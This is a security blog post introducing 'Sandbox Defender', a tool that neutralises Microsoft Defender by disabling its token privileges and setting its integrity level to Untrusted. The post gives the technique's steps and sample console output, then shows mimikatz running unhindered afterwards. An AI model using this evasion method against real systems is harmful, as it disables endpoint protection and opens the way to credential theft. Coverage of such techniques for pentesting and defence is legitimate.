Offensive Security Tool: Sandbox Defender
Reading Time: 2 Minutes
Offensive Security Tool: Sandbox Defender
Sandbox Defender
This tool was just written by plackyhacker that allows Pentesters and Bug Bounty Hunters demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack.
The idea and technique behind it is: Sandboxing Microsoft Defender (and other AV/EDRs) using Security Token manipulation.
Introduction
The technique is very simple:
- Enable the SeDubgPrivilege in our process security token.
- Get a handle to Defender using PROCESS_QUERY_LIMITED_INFORMATION.
- Get a handle to the Defender token using TOKEN_ALL_ACCESS.
- Disable all privileges in the token using SetPrivilege
- Set the Defender token Integrity level to Untrusted.
See Also: Complete Offensive Security and Ethical Hacking Course
Example
Execution of the code is shown below (then executing mimikatz after defender is sandboxed):
.\SandboxDefender.exe
[+] Getting a token handle for this process.
[+] Token handle: 0x2EC
[+] Enabling SeDebugPrivilege.
[+] SeDebugPrivilege enabled.
[+] Defender PID: 5212
[+] Getting a process handle for Defender.
[+] Process handle: 0x2F0
[+] Getting a token handle for the Defender process.
[+] Token handle: 0x2F4
[+] Will disable Defender privileges.
[+] Will set Defender Integrity to Untrusted.
[+] Done... Have a nice day!
.\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz #
See Also: PHP Everywhere RCE flaws threaten thousands of WordPress sites
Nice Pictures
This is Defender before the sandboxing (in Process Hacker):
This is Defender after the sandboxing (in Process Hacker):
See Also: How ILOVEYOU worm became the first global computer virus pandemic
Recent Tools
Offensive Security Tool: emp3r0r
emp3r0r is a post-exploitation framework designed for both Linux and …Blue Team Tool: Ghostport
Ghostport is a sophisticated port spoofing tool designed to confuse …Red Teaming Tool: avred
Avred is a tool designed for Red Teamers to identify …Recon Tool: emailFinder
emailFinder is a web scraping tool that extracts email addresses …
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
